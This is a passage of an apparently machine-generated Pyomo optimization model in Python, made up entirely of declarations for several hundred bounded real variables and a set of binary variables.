m.x22 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x23 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x24 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x25 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x26 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x27 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x28 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x29 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x30 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x31 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x32 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x33 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x34 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x35 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x36 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x37 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x38 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x39 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x40 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x41 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x42 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x43 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x44 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x45 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x46 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x47 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x48 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x49 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x50 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x51 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x52 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x53 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x54 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x55 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x56 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x57 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x58 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x59 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x60 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x61 = Var(within=Reals,bounds=(None,None),initialize=0)
m.x62 = Var(within=Reals,bounds=(0,40),initialize=0)
m.x63 = Var(within=Reals,bounds=(0,40),initialize=0)
m.x64 = Var(within=Reals,bounds=(0,40),initialize=0)
m.x65 = Var(within=Reals,bounds=(0,40),initialize=0)
m.x66 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x67 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x68 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x69 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x70 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x71 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x72 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x73 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x74 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x75 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x76 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x77 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x78 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x79 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x80 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x81 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x82 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x83 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x84 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x85 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x86 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x87 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x88 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x89 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x90 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x91 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x92 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x93 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x94 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x95 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x96 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x97 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x98 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x99 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x100 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x101 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x102 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x103 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x104 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x105 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x106 = Var(within=Reals,bounds=(0,30),initialize=0)
m.x107 = Var(within=Reals,bounds=(0,30),initialize=0)
m.x108 = Var(within=Reals,bounds=(0,30),initialize=0)
m.x109 = Var(within=Reals,bounds=(0,30),initialize=0)
m.x110 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x111 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x112 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x113 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x114 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x115 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x116 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x117 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x118 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x119 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x120 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x121 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x122 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x123 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x124 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x125 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x126 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x127 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x128 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x129 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x130 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x131 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x132 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x133 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x134 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x135 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x136 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x137 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x138 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x139 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x140 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x141 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x142 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x143 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x144 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x145 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x146 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x147 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x148 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x149 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x150 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x151 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x152 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x153 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x154 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x155 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x156 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x157 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x158 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x159 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x160 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x161 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x162 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x163 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x164 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x165 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x166 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x167 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x168 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x169 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x170 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x171 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x172 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x173 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x174 = Var(within=Reals,bounds=(0,20),initialize=0)
m.x175 = Var(within=Reals,bounds=(0,20),initialize=0)
m.x176 = Var(within=Reals,bounds=(0,20),initialize=0)
m.x177 = Var(within=Reals,bounds=(0,20),initialize=0)
m.x178 = Var(within=Reals,bounds=(0,20),initialize=0)
m.x179 = Var(within=Reals,bounds=(0,20),initialize=0)
m.x180 = Var(within=Reals,bounds=(0,20),initialize=0)
m.x181 = Var(within=Reals,bounds=(0,20),initialize=0)
m.x182 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x183 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x184 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x185 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x186 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x187 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x188 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x189 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x190 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x191 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x192 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x193 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x194 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x195 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x196 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x197 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x198 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x199 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x200 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x201 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x202 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x203 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x204 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x205 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x206 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x207 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x208 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x209 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x210 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x211 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x212 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x213 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x214 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x215 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x216 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x217 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x218 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x219 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x220 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x221 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x222 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x223 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x224 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x225 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x226 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x227 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x228 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x229 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x230 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x231 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x232 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x233 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x234 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x235 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x236 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x237 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x238 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x239 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x240 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x241 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x242 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x243 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x244 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x245 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x246 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x247 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x248 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x249 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x250 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x251 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x252 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x253 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x254 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x255 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x256 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x257 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x258 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x259 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x260 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x261 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x262 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x263 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x264 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x265 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x266 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x267 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x268 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x269 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x270 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x271 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x272 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x273 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x274 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x275 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x276 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x277 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x278 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x279 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x280 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x281 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x282 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x283 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x284 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x285 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x286 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x287 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x288 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x289 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x290 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x291 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x292 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x293 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x294 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x295 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x296 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x297 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x298 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x299 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x300 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x301 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x302 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x303 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x304 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x305 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x306 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x307 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x308 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x309 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x310 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x311 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x312 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x313 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x314 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x315 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x316 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x317 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x318 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x319 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x320 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x321 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x322 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x323 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x324 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x325 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x326 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x327 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x328 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x329 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x330 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x331 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x332 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x333 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x334 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x335 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x336 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x337 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x338 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x339 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x340 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x341 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x342 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x343 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x344 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x345 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x346 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x347 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x348 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x349 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x350 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x351 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x352 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x353 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x354 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x355 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x356 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x357 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x358 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x359 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x360 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x361 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x362 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x363 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x364 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x365 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x366 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x367 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x368 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x369 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x370 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x371 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x372 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x373 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x374 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x375 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x376 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x377 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x378 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x379 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x380 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x381 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x382 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x383 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x384 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x385 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x386 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x387 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x388 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x389 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x390 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x391 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x392 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x393 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x394 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x395 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x396 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x397 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x398 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x399 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x400 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x401 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x402 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x403 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x404 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x405 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x406 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x407 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x408 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x409 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x410 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x411 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x412 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x413 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x414 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x415 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x416 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x417 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x418 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x419 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x420 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x421 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x422 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x423 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x424 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x425 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x426 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x427 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x428 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x429 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x430 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x431 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x432 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x433 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x434 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x435 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x436 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x437 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x438 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x439 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x440 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x441 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x442 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x443 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x444 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x445 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x446 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x447 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x448 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x449 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x450 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x451 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x452 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x453 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x454 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x455 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x456 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x457 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x458 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x459 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x460 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x461 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x462 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x463 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x464 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x465 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x466 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x467 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x468 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x469 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x470 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x471 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x472 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x473 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x474 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x475 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x476 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x477 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x478 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x479 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x480 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x481 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x482 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x483 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x484 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x485 = Var(within=Reals,bounds=(0,None),initialize=0)
m.b486 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b487 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b488 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b489 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b490 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b491 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b492 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b493 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b494 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b495 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b496 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b497 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b498 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b499 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b500 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b501 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b502 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b503 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b504 = Var(within=Binary,bounds=(0,1),initialize=0)
